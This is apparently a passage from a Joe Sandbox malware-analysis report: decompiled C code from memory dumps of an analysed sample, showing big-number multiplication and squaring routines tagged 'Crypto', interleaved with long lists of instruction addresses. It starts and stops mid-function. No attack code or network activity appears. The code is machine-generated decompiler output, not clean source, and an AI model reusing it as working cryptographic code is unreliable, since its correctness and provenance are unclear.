				_t388 = _t387 * _t502;
				_t302 = _t301 * _t299;
				_t563 = _t301 * _t502;
				_t261 = _t387 * _t299 + _t563;
				if(_t261 < _t563) {
					_t302 = _t302 + 0x10000;
				}
				_t262 = _t261 << 0x10;
				_t389 = _t388 + _t262;
				_t303 = _t302 + (_t261 >> 0x10);
				if(_t389 < _t262) {
					_t303 = _t303 + 1;
				}
				_t567 = _v8 + _t389;
				if(_t567 < _t389) {
					_t303 = _t303 + 1;
				}
				_t263 = _a4;
				 *((intOrPtr*)(_t263 + 0x18)) = _t567;
				 *((intOrPtr*)(_t263 + 0x1c)) = _t303 + _v12;
				return _t263;
			}



































































































































































    0x003a8a1c
    0x003a8a1c
    0x003a8a27
    0x003a8a2c
    0x003a8a30
    0x003a8a36
    0x003a8a39
    0x003a8a3e
    0x003a8a48
    0x003a8a4f
    0x003a8a55
    0x003a8a5b
    0x003a8a5d
    0x003a8a5d
    0x003a8a66
    0x003a8a6c
    0x003a8a6f
    0x003a8a73
    0x003a8a75
    0x003a8a75
    0x003a8a7b
    0x003a8a7d
    0x003a8a84
    0x003a8a88
    0x003a8a91
    0x003a8a95
    0x003a8a98
    0x003a8a9d
    0x003a8aa4
    0x003a8aaa
    0x003a8aae
    0x003a8ab0
    0x003a8ab0
    0x003a8ab8
    0x003a8abe
    0x003a8ac0
    0x003a8ac4
    0x003a8ac6
    0x003a8ac6
    0x003a8aca
    0x003a8acc
    0x003a8acf
    0x003a8ad4
    0x003a8ad7
    0x003a8ad7
    0x003a8ade
    0x003a8ae1
    0x003a8ae5
    0x003a8ae9
    0x003a8af5
    0x003a8afa
    0x003a8b01
    0x003a8b03
    0x003a8b08
    0x003a8b0a
    0x003a8b0a
    0x003a8b15
    0x003a8b1a
    0x003a8b1d
    0x003a8b21
    0x003a8b23
    0x003a8b23
    0x003a8b27
    0x003a8b2b
    0x003a8b2d
    0x003a8b2d
    0x003a8b31
    0x003a8b33
    0x003a8b38
    0x003a8b3a
    0x003a8b3a
    0x003a8b44
    0x003a8b4b
    0x003a8b4e
    0x003a8b52
    0x003a8b56
    0x003a8b5a
    0x003a8b66
    0x003a8b6b
    0x003a8b72
    0x003a8b74
    0x003a8b79
    0x003a8b7b
    0x003a8b7b
    0x003a8b86
    0x003a8b8b
    0x003a8b8e
    0x003a8b92
    0x003a8b94
    0x003a8b94
    0x003a8b95
    0x003a8b9b
    0x003a8b9d
    0x003a8b9d
    0x003a8b9e
    0x003a8ba4
    0x003a8ba6
    0x003a8ba6
    0x003a8bb1
    0x003a8bb5
    0x003a8bb9
    0x003a8bbd
    0x003a8bc9
    0x003a8bce
    0x003a8bd5
    0x003a8bd7
    0x003a8bdc
    0x003a8bde
    0x003a8bde
    0x003a8be9
    0x003a8bee
    0x003a8bf1
    0x003a8bf5
    0x003a8bf7
    0x003a8bf7
    0x003a8bf8
    0x003a8bfe
    0x003a8c00
    0x003a8c00
    0x003a8c01
    0x003a8c07
    0x003a8c09
    0x003a8c09
    0x003a8c10
    0x003a8c14
    0x003a8c17
    0x003a8c1b
    0x003a8c27
    0x003a8c2c
    0x003a8c33
    0x003a8c35
    0x003a8c3a
    0x003a8c3c
    0x003a8c3c
    0x003a8c47
    0x003a8c4c
    0x003a8c4f
    0x003a8c53
    0x003a8c55
    0x003a8c55
    0x003a8c59
    0x003a8c5d
    0x003a8c5f
    0x003a8c5f
    0x003a8c60
    0x003a8c66
    0x003a8c68
    0x003a8c68
    0x003a8c6e
    0x003a8c75
    0x003a8c79
    0x003a8c7c
    0x003a8c80
    0x003a8c84
    0x003a8c90
    0x003a8c95
    0x003a8c9c
    0x003a8c9e
    0x003a8ca3
    0x003a8ca5
    0x003a8ca5
    0x003a8cb0
    0x003a8cb5
    0x003a8cb8
    0x003a8cbc
    0x003a8cbe
    0x003a8cbe
    0x003a8cbf
    0x003a8cc5
    0x003a8cc7
    0x003a8cc7
    0x003a8cc8
    0x003a8cce
    0x003a8cd0
    0x003a8cd0
    0x003a8cdb
    0x003a8cdf
    0x003a8ce3
    0x003a8ce7
    0x003a8cf3
    0x003a8cf8
    0x003a8cff
    0x003a8d01
    0x003a8d06
    0x003a8d08
    0x003a8d08
    0x003a8d13
    0x003a8d18
    0x003a8d1b
    0x003a8d1f
    0x003a8d21
    0x003a8d21
    0x003a8d22
    0x003a8d28
    0x003a8d2a
    0x003a8d2a
    0x003a8d2b
    0x003a8d31
    0x003a8d33
    0x003a8d33
    0x003a8d3a
    0x003a8d3e
    0x003a8d42
    0x003a8d46
    0x003a8d52
    0x003a8d57
    0x003a8d5e
    0x003a8d60
    0x003a8d65
    0x003a8d67
    0x003a8d67
    0x003a8d72
    0x003a8d77
    0x003a8d7a
    0x003a8d7e
    0x003a8d80
    0x003a8d80
    0x003a8d81
    0x003a8d87
    0x003a8d89
    0x003a8d89
    0x003a8d8a
    0x003a8d90
    0x003a8d92
    0x003a8d92
    0x003a8d99
    0x003a8d9c
    0x003a8da0
    0x003a8da4
    0x003a8db0
    0x003a8db5
    0x003a8dbc
    0x003a8dbe
    0x003a8dc3
    0x003a8dc5
    0x003a8dc5
    0x003a8dd0
    0x003a8dd5
    0x003a8dd8
    0x003a8ddc
    0x003a8dde
    0x003a8dde
    0x003a8de2
    0x003a8de6
    0x003a8de8
    0x003a8de8
    0x003a8de9
    0x003a8def
    0x003a8df1
    0x003a8df1
    0x003a8df7
    0x003a8dfe
    0x003a8e02
    0x003a8e06
    0x003a8e0a
    0x003a8e0e
    0x003a8e1a
    0x003a8e1f
    0x003a8e26
    0x003a8e28
    0x003a8e2d
    0x003a8e2f
    0x003a8e2f
    0x003a8e3a
    0x003a8e3f
    0x003a8e42
    0x003a8e46
    0x003a8e48
    0x003a8e48
    0x003a8e49
    0x003a8e4f
    0x003a8e51
    0x003a8e51
    0x003a8e52
    0x003a8e58
    0x003a8e5a
    0x003a8e5a
    0x003a8e65
    0x003a8e69
    0x003a8e6d
    0x003a8e71
    0x003a8e7d
    0x003a8e82
    0x003a8e89
    0x003a8e8b
    0x003a8e90
    0x003a8e92
    0x003a8e92
    0x003a8e9d
    0x003a8ea2
    0x003a8ea5
    0x003a8ea9
    0x003a8eab
    0x003a8eab
    0x003a8eac
    0x003a8eb2
    0x003a8eb4
    0x003a8eb4
    0x003a8eb5
    0x003a8ebb
    0x003a8ebd
    0x003a8ebd
    0x003a8ec4
    0x003a8ec8
    0x003a8ecc
    0x003a8ed0
    0x003a8edc
    0x003a8ee1
    0x003a8ee8
    0x003a8eea
    0x003a8eef
    0x003a8ef1
    0x003a8ef1
    0x003a8efc
    0x003a8f01
    0x003a8f04
    0x003a8f08
    0x003a8f0a
    0x003a8f0a
    0x003a8f0e
    0x003a8f12
    0x003a8f14
    0x003a8f14
    0x003a8f15
    0x003a8f1b
    0x003a8f1d
    0x003a8f1d
    0x003a8f23
    0x003a8f2a
    0x003a8f2e
    0x003a8f32
    0x003a8f36
    0x003a8f3a
    0x003a8f46
    0x003a8f4b
    0x003a8f52
    0x003a8f54
    0x003a8f59
    0x003a8f5b
    0x003a8f5b
    0x003a8f66
    0x003a8f6b
    0x003a8f6e
    0x003a8f72
    0x003a8f74
    0x003a8f74
    0x003a8f75
    0x003a8f7b
    0x003a8f7d
    0x003a8f7d
    0x003a8f7e
    0x003a8f84
    0x003a8f86
    0x003a8f86
    0x003a8f91
    0x003a8f95
    0x003a8f99
    0x003a8f9d
    0x003a8fa9
    0x003a8fae
    0x003a8fb5
    0x003a8fb7
    0x003a8fbc
    0x003a8fbe
    0x003a8fbe
    0x003a8fc9
    0x003a8fce
    0x003a8fd1
    0x003a8fd5
    0x003a8fd7
    0x003a8fd7
    0x003a8fdb
    0x003a8fdf
    0x003a8fe1
    0x003a8fe1
    0x003a8fe2
    0x003a8fe8
    0x003a8fea
    0x003a8fea
    0x003a8ff0
    0x003a8ff3
    0x003a8ff7
    0x003a8ffb
    0x003a8fff
    0x003a9005
    0x003a900d
    0x003a9010
    0x003a9013
    0x003a9017
    0x003a9019
    0x003a9019
    0x003a9021
    0x003a9027
    0x003a9029
    0x003a902d
    0x003a902f
    0x003a902f
    0x003a9033
    0x003a9037
    0x003a9039
    0x003a9039
    0x003a903a
    0x003a9041
    0x003a9045
    0x003a904a

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A9F4C, Relevance: .4, Instructions: 363Crypto
    C-Code - Quality: 100%
    			E003A9F4C(unsigned int* __eax, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _t167;
				unsigned int _t168;
				signed int _t169;
				void* _t174;
				unsigned int _t175;
				signed int _t176;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				intOrPtr _t182;
				signed int _t183;
				signed int _t184;
				void* _t186;
				signed int _t188;
				signed int _t189;
				void* _t190;
				signed int _t192;
				void* _t194;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t203;
				void* _t204;
				signed int _t206;
				signed int _t207;
				void* _t208;
				signed int _t210;
				void* _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				void* _t225;
				unsigned int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				void* _t233;
				unsigned int _t234;
				signed int _t235;
				void* _t237;
				unsigned int _t240;
				signed int _t241;
				signed int _t242;
				unsigned int _t245;
				signed int _t246;
				void* _t247;
				unsigned int _t250;
				signed int _t251;
				void* _t252;
				unsigned int _t253;
				signed int _t254;
				void* _t256;
				unsigned int _t259;
				signed int _t260;
				signed int _t261;
				intOrPtr _t263;
				unsigned int _t266;
				signed int _t267;
				signed int _t268;
				intOrPtr _t270;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				void* _t279;
				signed int _t282;
				signed int _t284;
				signed int _t287;
				signed int _t289;
				signed int _t292;
				signed int _t294;
				signed int _t299;
				signed int _t301;
				signed int _t304;
				signed int _t306;
				void* _t310;
				void* _t311;
				intOrPtr _t312;
				unsigned int _t317;
				signed int _t318;
				void* _t319;
				intOrPtr _t320;
				unsigned int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t328;
				void* _t329;
				signed int _t330;
				signed int _t331;
				void* _t332;
				unsigned int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				void* _t338;
				signed int _t339;
				signed int _t340;
				void* _t341;
				signed int _t342;

				_t167 = __eax;
				_t175 =  *__eax;
				_t184 = _t175 & 0x0000ffff;
				_t176 = _t175 >> 0x10;
				_t228 = _t184 * _t176;
				_t229 = _t228 << 0x11;
				_t186 = _t184 * _t184 + _t229;
				_t178 = _t176 * _t176 + (_t228 >> 0xf);
				if(_t186 < _t229) {
					_t178 = _t178 + 1;
				}
				 *_a4 = _t186;
				_t274 = _t167[1] & 0x0000ffff;
				_t231 = _t167[3] & 0x0000ffff;
				_v8 = _v8 & 0x00000000;
				_v16 =  *_t167 & 0x0000ffff;
				_t188 = _t167[2] & 0x0000ffff;
				_t189 = _t188 * _v16;
				_v20 = _t274;
				_t232 = _t231 * _v20;
				_t276 = _t231 * _v16;
				_t317 = _t188 * _t274 + _t276;
				if(_t317 < _t276) {
					_t232 = _t232 + 0x10000;
				}
				_t318 = _t317 << 0x10;
				_t190 = _t189 + _t318;
				_t233 = _t232 + (_t317 >> 0x10);
				if(_t190 < _t318) {
					_t233 = _t233 + 1;
				}
				_t319 = _t190 + _t178;
				_t279 = _t233;
				if(_t319 < _t190) {
					_t279 = _t233 + 1;
				}
				_t320 = _t319 + _t190;
				if(_t320 < _t190) {
					_t233 = _t233 + 1;
				}
				_t179 = _t279 + _t233;
				if(_t179 < _t233) {
					_v8 = 1;
				}
				_v12 = _v12 & 0x00000000;
				 *((intOrPtr*)(_a4 + 4)) = _t320;
				_t234 = _t167[2];
				_t192 = _t234 & 0x0000ffff;
				_t235 = _t234 >> 0x10;
				_t322 = _t192 * _t235;
				_t323 = _t322 << 0x11;
				_t194 = _t192 * _t192 + _t323;
				_t237 = _t235 * _t235 + (_t322 >> 0xf);
				if(_t194 < _t323) {
					_t237 = _t237 + 1;
				}
				_t180 = _t179 + _t194;
				if(_t180 < _t194) {
					_t237 = _t237 + 1;
				}
				_v8 = _v8 + _t237;
				if(_v8 < _t237) {
					_v12 = 1;
				}
				_t324 = _t167[4] & 0x0000ffff;
				_t282 = _t167[1] & 0x0000ffff;
				_v16 =  *_t167 & 0x0000ffff;
				_t196 = _t167[5] & 0x0000ffff;
				_t325 = _t324 * _v16;
				_v20 = _t282;
				_t197 = _t196 * _v20;
				_t284 = _t196 * _v16;
				_t240 = _t324 * _t282 + _t284;
				if(_t240 < _t284) {
					_t197 = _t197 + 0x10000;
				}
				_t241 = _t240 << 0x10;
				_t326 = _t325 + _t241;
				_t198 = _t197 + (_t240 >> 0x10);
				if(_t326 < _t241) {
					_t198 = _t198 + 1;
				}
				_t181 = _t180 + _t326;
				_v20 = _t198;
				_t242 = _t198;
				if(_t181 < _t326) {
					_t242 = _t198 + 1;
				}
				_v8 = _v8 + _t242;
				if(_v8 < _t242) {
					_v12 = _v12 + 1;
				}
				_t182 = _t181 + _t326;
				_t199 = _t198 + 1;
				if(_t199 >= 0) {
					_t199 = _v20;
				}
				_v8 = _v8 + _t199;
				if(_v8 < _t199) {
					_v12 = _v12 + 1;
				}
				_v16 = _v16 & 0x00000000;
				 *((intOrPtr*)(_a4 + 8)) = _t182;
				_t287 =  *_t167 & 0x0000ffff;
				_t327 = _t167[6] & 0x0000ffff;
				_v20 = _t167[1] & 0x0000ffff;
				_t202 = _t167[7] & 0x0000ffff;
				_t328 = _t327 * _t287;
				_v24 = _t287;
				_t203 = _t202 * _v20;
				_t289 = _t202 * _v24;
				_t245 = _t327 * _v20 + _t289;
				if(_t245 < _t289) {
					_t203 = _t203 + 0x10000;
				}
				_t246 = _t245 << 0x10;
				_t329 = _t328 + _t246;
				_t204 = _t203 + (_t245 >> 0x10);
				if(_t329 < _t246) {
					_t204 = _t204 + 1;
				}
				_v8 = _v8 + _t329;
				_t247 = _t204;
				if(_v8 < _t329) {
					_t247 = _t204 + 1;
				}
				_v12 = _v12 + _t247;
				if(_v12 < _t247) {
					_v16 = 1;
				}
				_v8 = _v8 + _t329;
				if(_v8 < _t329) {
					_t204 = _t204 + 1;
				}
				_v12 = _v12 + _t204;
				if(_v12 < _t204) {
					_v16 = _v16 + 1;
				}
				_t292 = _t167[2] & 0x0000ffff;
				_t330 = _t167[4] & 0x0000ffff;
				_v20 = _t167[3] & 0x0000ffff;
				_t206 = _t167[5] & 0x0000ffff;
				_t331 = _t330 * _t292;
				_v24 = _t292;
				_t207 = _t206 * _v20;
				_t294 = _t206 * _v24;
				_t250 = _t330 * _v20 + _t294;
				if(_t250 < _t294) {
					_t207 = _t207 + 0x10000;
				}
				_t251 = _t250 << 0x10;
				_t332 = _t331 + _t251;
				_t208 = _t207 + (_t250 >> 0x10);
				if(_t332 < _t251) {
					_t208 = _t208 + 1;
				}
				_v8 = _v8 + _t332;
				_t252 = _t208;
				if(_v8 < _t332) {
					_t252 = _t208 + 1;
				}
				_v12 = _v12 + _t252;
				if(_v12 < _t252) {
					_v16 = _v16 + 1;
				}
				_v8 = _v8 + _t332;
				if(_v8 < _t332) {
					_t208 = _t208 + 1;
				}
				_v12 = _v12 + _t208;
				if(_v12 < _t208) {
					_v16 = _v16 + 1;
				}
				_t183 = _a4;
				_v8 = _v8 & 0x00000000;
				 *((intOrPtr*)(_t183 + 0xc)) = _v8;
				_t253 = _t167[4];
				_t210 = _t253 & 0x0000ffff;
				_t254 = _t253 >> 0x10;
				_t334 = _t210 * _t254;
				_t335 = _t334 << 0x11;
				_t212 = _t210 * _t210 + _t335;
				_t256 = _t254 * _t254 + (_t334 >> 0xf);
				if(_t212 < _t335) {
					_t256 = _t256 + 1;
				}
				_v12 = _v12 + _t212;
				if(_v12 < _t212) {
					_t256 = _t256 + 1;
				}
				_v16 = _v16 + _t256;
				if(_v16 < _t256) {
					_v8 = 1;
				}
				_t299 = _t167[2] & 0x0000ffff;
				_t336 = _t167[6] & 0x0000ffff;
				_a4 = _t167[3] & 0x0000ffff;
				_t214 = _t167[7] & 0x0000ffff;
				_t337 = _t336 * _t299;
				_v24 = _t299;
				_t215 = _t214 * _a4;
				_t301 = _t214 * _v24;
				_t259 = _t336 * _a4 + _t301;
				if(_t259 < _t301) {
					_t215 = _t215 + 0x10000;
				}
				_t260 = _t259 << 0x10;
				_t338 = _t337 + _t260;
				_t216 = _t215 + (_t259 >> 0x10);
				if(_t338 < _t260) {
					_t216 = _t216 + 1;
				}
				_v12 = _v12 + _t338;
				_a4 = _t216;
				_t261 = _t216;
				if(_v12 < _t338) {
					_t126 = _t216 + 1; // 0x1
					_t261 = _t126;
				}
				_v16 = _v16 + _t261;
				if(_v16 < _t261) {
					_v8 = _v8 + 1;
				}
				_t263 = _v12 + _t338;
				_t217 = _t216 + 1;
				if(_t217 >= 0) {
					_t217 = _a4;
				}
				_v16 = _v16 + _t217;
				if(_v16 < _t217) {
					_v8 = _v8 + 1;
				}
				_v12 = _v12 & 0x00000000;
				 *((intOrPtr*)(_t183 + 0x10)) = _t263;
				_t304 = _t167[4] & 0x0000ffff;
				_t339 = _t167[6] & 0x0000ffff;
				_a4 = _t167[5] & 0x0000ffff;
				_t219 = _t167[7] & 0x0000ffff;
				_t340 = _t339 * _t304;
				_v24 = _t304;
				_t220 = _t219 * _a4;
				_t306 = _t219 * _v24;
				_t266 = _t339 * _a4 + _t306;
				if(_t266 < _t306) {
					_t220 = _t220 + 0x10000;
				}
				_t267 = _t266 << 0x10;
				_t341 = _t340 + _t267;
				_t221 = _t220 + (_t266 >> 0x10);
				if(_t341 < _t267) {
					_t221 = _t221 + 1;
				}
				_v16 = _v16 + _t341;
				_a4 = _t221;
				_t268 = _t221;
				if(_v16 < _t341) {
					_t155 = _t221 + 1; // 0x1
					_t268 = _t155;
				}
				_t310 = _v8 + _t268;
				if(_t310 < _t268) {
					_v12 = 1;
				}
				_t270 = _v16 + _t341;
				_t222 = _t221 + 1;
				if(_t222 >= 0) {
					_t222 = _a4;
				}
				_t311 = _t310 + _t222;
				if(_t311 < _t222) {
					_v12 = _v12 + 1;
				}
				 *((intOrPtr*)(_t183 + 0x14)) = _t270;
				_t168 = _t167[6];
				_t342 = _t168 & 0x0000ffff;
				_t169 = _t168 >> 0x10;
				_t272 = _t342 * _t169;
				_t225 = _t169 * _t169 + (_t272 >> 0xf);
				_t273 = _t272 << 0x11;
				_t174 = _t342 * _t342 + _t273;
				if(_t174 < _t273) {
					_t225 = _t225 + 1;
				}
				_t312 = _t311 + _t174;
				if(_t312 < _t174) {
					_t225 = _t225 + 1;
				}
				 *((intOrPtr*)(_t183 + 0x18)) = _t312;
				 *((intOrPtr*)(_t183 + 0x1c)) = _t225 + _v12;
				return _t174;
			}






















































































































    0x003a9f4c
    0x003a9f53
    0x003a9f55
    0x003a9f58
    0x003a9f60
    0x003a9f69
    0x003a9f6f
    0x003a9f71
    0x003a9f76
    0x003a9f78
    0x003a9f78
    0x003a9f7c
    0x003a9f81
    0x003a9f85
    0x003a9f89
    0x003a9f8d
    0x003a9f90
    0x003a9f96
    0x003a9f9d
    0x003a9fa2
    0x003a9fa6
    0x003a9faa
    0x003a9fae
    0x003a9fb0
    0x003a9fb0
    0x003a9fb8
    0x003a9fbe
    0x003a9fc0
    0x003a9fc4
    0x003a9fc6
    0x003a9fc6
    0x003a9fc7
    0x003a9fca
    0x003a9fce
    0x003a9fd0
    0x003a9fd0
    0x003a9fd3
    0x003a9fd7
    0x003a9fd9
    0x003a9fd9
    0x003a9fda
    0x003a9fdf
    0x003a9fe1
    0x003a9fe1
    0x003a9feb
    0x003a9fef
    0x003a9ff2
    0x003a9ff5
    0x003a9ff8
    0x003aa000
    0x003aa008
    0x003aa00e
    0x003aa010
    0x003aa014
    0x003aa016
    0x003aa016
    0x003aa017
    0x003aa01b
    0x003aa01d
    0x003aa01d
    0x003aa01e
    0x003aa024
    0x003aa026
    0x003aa026
    0x003aa030
    0x003aa034
    0x003aa038
    0x003aa03b
    0x003aa041
    0x003aa048
    0x003aa04d
    0x003aa051
    0x003aa055
    0x003aa059
    0x003aa05b
    0x003aa05b
    0x003aa063
    0x003aa069
    0x003aa06b
    0x003aa06f
    0x003aa071
    0x003aa071
    0x003aa072
    0x003aa074
    0x003aa077
    0x003aa07b
    0x003aa07d
    0x003aa07d
    0x003aa080
    0x003aa086
    0x003aa088
    0x003aa088
    0x003aa08b
    0x003aa08f
    0x003aa090
    0x003aa092
    0x003aa092
    0x003aa095
    0x003aa09b
    0x003aa09d
    0x003aa09d
    0x003aa0a3
    0x003aa0a7
    0x003aa0ae
    0x003aa0b1
    0x003aa0b5
    0x003aa0b8
    0x003aa0be
    0x003aa0c5
    0x003aa0ca
    0x003aa0ce
    0x003aa0d2
    0x003aa0d6
    0x003aa0d8
    0x003aa0d8
    0x003aa0e0
    0x003aa0e6
    0x003aa0e8
    0x003aa0ec
    0x003aa0ee
    0x003aa0ee
    0x003aa0ef
    0x003aa0f2
    0x003aa0f7
    0x003aa0f9
    0x003aa0f9
    0x003aa0fc
    0x003aa102
    0x003aa104
    0x003aa104
    0x003aa10b
    0x003aa111
    0x003aa113
    0x003aa113
    0x003aa114
    0x003aa11a
    0x003aa11c
    0x003aa11c
    0x003aa123
    0x003aa127
    0x003aa12b
    0x003aa12e
    0x003aa134
    0x003aa13b
    0x003aa140
    0x003aa144
    0x003aa148
    0x003aa14c
    0x003aa14e
    0x003aa14e
    0x003aa156
    0x003aa15c
    0x003aa15e
    0x003aa162
    0x003aa164
    0x003aa164
    0x003aa165
    0x003aa168
    0x003aa16d
    0x003aa16f
    0x003aa16f
    0x003aa172
    0x003aa178
    0x003aa17a
    0x003aa17a
    0x003aa17d
    0x003aa183
    0x003aa185
    0x003aa185
    0x003aa186
    0x003aa18c
    0x003aa18e
    0x003aa18e
    0x003aa194
    0x003aa197
    0x003aa19b
    0x003aa19e
    0x003aa1a1
    0x003aa1a4
    0x003aa1ac
    0x003aa1b4
    0x003aa1ba
    0x003aa1bc
    0x003aa1c0
    0x003aa1c2
    0x003aa1c2
    0x003aa1c3
    0x003aa1c9
    0x003aa1cb
    0x003aa1cb
    0x003aa1cc
    0x003aa1d2
    0x003aa1d4
    0x003aa1d4
    0x003aa1df
    0x003aa1e3
    0x003aa1e7
    0x003aa1ea
    0x003aa1f0
    0x003aa1f7
    0x003aa1fc
    0x003aa200
    0x003aa204
    0x003aa208
    0x003aa20a
    0x003aa20a
    0x003aa212
    0x003aa218
    0x003aa21a
    0x003aa21e
    0x003aa220
    0x003aa220
    0x003aa221
    0x003aa224
    0x003aa227
    0x003aa22c
    0x003aa22e
    0x003aa22e
    0x003aa22e
    0x003aa231
    0x003aa237
    0x003aa239
    0x003aa239
    0x003aa23f
    0x003aa243
    0x003aa244
    0x003aa246
    0x003aa246
    0x003aa249
    0x003aa24f
    0x003aa251
    0x003aa251
    0x003aa254
    0x003aa258
    0x003aa25f
    0x003aa263
    0x003aa267
    0x003aa26a
    0x003aa270
    0x003aa277
    0x003aa27c
    0x003aa280
    0x003aa284
    0x003aa288
    0x003aa28a
    0x003aa28a
    0x003aa292
    0x003aa298
    0x003aa29a
    0x003aa29e
    0x003aa2a0
    0x003aa2a0
    0x003aa2a1
    0x003aa2a4
    0x003aa2a7
    0x003aa2ac
    0x003aa2ae
    0x003aa2ae
    0x003aa2ae
    0x003aa2b4
    0x003aa2b8
    0x003aa2ba
    0x003aa2ba
    0x003aa2c4
    0x003aa2c8
    0x003aa2c9
    0x003aa2cb
    0x003aa2cb
    0x003aa2ce
    0x003aa2d2
    0x003aa2d4
    0x003aa2d4
    0x003aa2d7
    0x003aa2da
    0x003aa2dd
    0x003aa2e0
    0x003aa2ea
    0x003aa2f2
    0x003aa2f9
    0x003aa2fc
    0x003aa300
    0x003aa302
    0x003aa302
    0x003aa303
    0x003aa307
    0x003aa309
    0x003aa309
    0x003aa30d
    0x003aa312
    0x003aa317

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A69E7, Relevance: .2, Instructions: 207Crypto
    C-Code - Quality: 100%
    			E003A69E7(intOrPtr* __ecx, unsigned int* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				unsigned int _t64;
				signed int _t67;
				signed int _t70;
				intOrPtr _t71;
				signed int _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				intOrPtr _t76;
				signed int _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;
				signed int _t82;
				signed int _t83;
				void* _t84;
				void* _t85;
				intOrPtr _t86;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				unsigned int* _t95;
				void* _t96;
				intOrPtr* _t97;
				unsigned int _t100;
				unsigned int _t104;
				signed int _t105;
				unsigned int _t106;
				unsigned int _t110;
				signed int _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				unsigned int _t114;
				unsigned int _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr _t121;
				unsigned int _t122;
				unsigned int _t126;
				signed int _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				unsigned int _t130;
				unsigned int _t134;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				intOrPtr _t139;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed int _t158;
				signed int _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				void* _t175;
				void* _t176;
				intOrPtr _t177;

				_t97 = __ecx;
				_v16 = _v16 & 0x00000000;
				_t95 = __edx;
				if(_a4 > 0) {
					_v8 = _t64 & 0x0000ffff;
					_v12 = _t64 >> 0x10;
					while((_a4 & 0xfffffffc) != 0) {
						_t100 =  *_t95;
						_t158 = _t100 & 0x0000ffff;
						_t137 = _t100 >> 0x10;
						_t159 = _t158 * _v8;
						_t138 = _t137 * _v12;
						_t67 = _t137 * _v8;
						_t104 = _t158 * _v12 + _t67;
						if(_t104 < _t67) {
							_t138 = _t138 + 0x10000;
						}
						_t105 = _t104 << 0x10;
						_t160 = _t159 + _t105;
						_t139 = _t138 + (_t104 >> 0x10);
						if(_t160 < _t105) {
							_t139 = _t139 + 1;
						}
						_t70 = _v16;
						_t161 = _t160 + _t70;
						_v20 = _t139;
						if(_t161 < _t70) {
							_v20 = _t139 + 1;
						}
						_t71 =  *_t97;
						_t162 = _t161 + _t71;
						if(_t162 < _t71) {
							_v20 = _v20 + 1;
						}
						 *_t97 = _t162;
						_t106 = _t95[1];
						_t72 = _t106 & 0x0000ffff;
						_t163 = _t106 >> 0x10;
						_t73 = _t72 * _v8;
						_t164 = _t163 * _v12;
						_t141 = _t163 * _v8;
						_t110 = _t72 * _v12 + _t141;
						if(_t110 < _t141) {
							_t164 = _t164 + 0x10000;
						}
						_t111 = _t110 << 0x10;
						_t74 = _t73 + _t111;
						_t165 = _t164 + (_t110 >> 0x10);
						if(_t74 < _t111) {
							_t165 = _t165 + 1;
						}
						_t112 = _v20;
						_t75 = _t74 + _t112;
						_v16 = _t165;
						if(_t75 < _t112) {
							_v16 = _t165 + 1;
						}
						_t113 =  *((intOrPtr*)(_t97 + 4));
						_t76 = _t75 + _t113;
						if(_t76 < _t113) {
							_v16 = _v16 + 1;
						}
						 *((intOrPtr*)(_t97 + 4)) = _t76;
						_t114 = _t95[2];
						_t77 = _t114 & 0x0000ffff;
						_t166 = _t114 >> 0x10;
						_t78 = _t77 * _v8;
						_t167 = _t166 * _v12;
						_t145 = _t166 * _v8;
						_t118 = _t77 * _v12 + _t145;
						if(_t118 < _t145) {
							_t167 = _t167 + 0x10000;
						}
						_t119 = _t118 << 0x10;
						_t79 = _t78 + _t119;
						_t168 = _t167 + (_t118 >> 0x10);
						if(_t79 < _t119) {
							_t168 = _t168 + 1;
						}
						_t120 = _v16;
						_t80 = _t79 + _t120;
						_v20 = _t168;
						if(_t80 < _t120) {
							_v20 = _t168 + 1;
						}
						_t121 =  *((intOrPtr*)(_t97 + 8));
						_t81 = _t80 + _t121;
						if(_t81 < _t121) {
							_v20 = _v20 + 1;
						}
						 *((intOrPtr*)(_t97 + 8)) = _t81;
						_t122 = _t95[3];
						_t82 = _t122 & 0x0000ffff;
						_t169 = _t122 >> 0x10;
						_t83 = _t82 * _v8;
						_t170 = _t169 * _v12;
						_t149 = _t169 * _v8;
						_t126 = _t82 * _v12 + _t149;
						if(_t126 < _t149) {
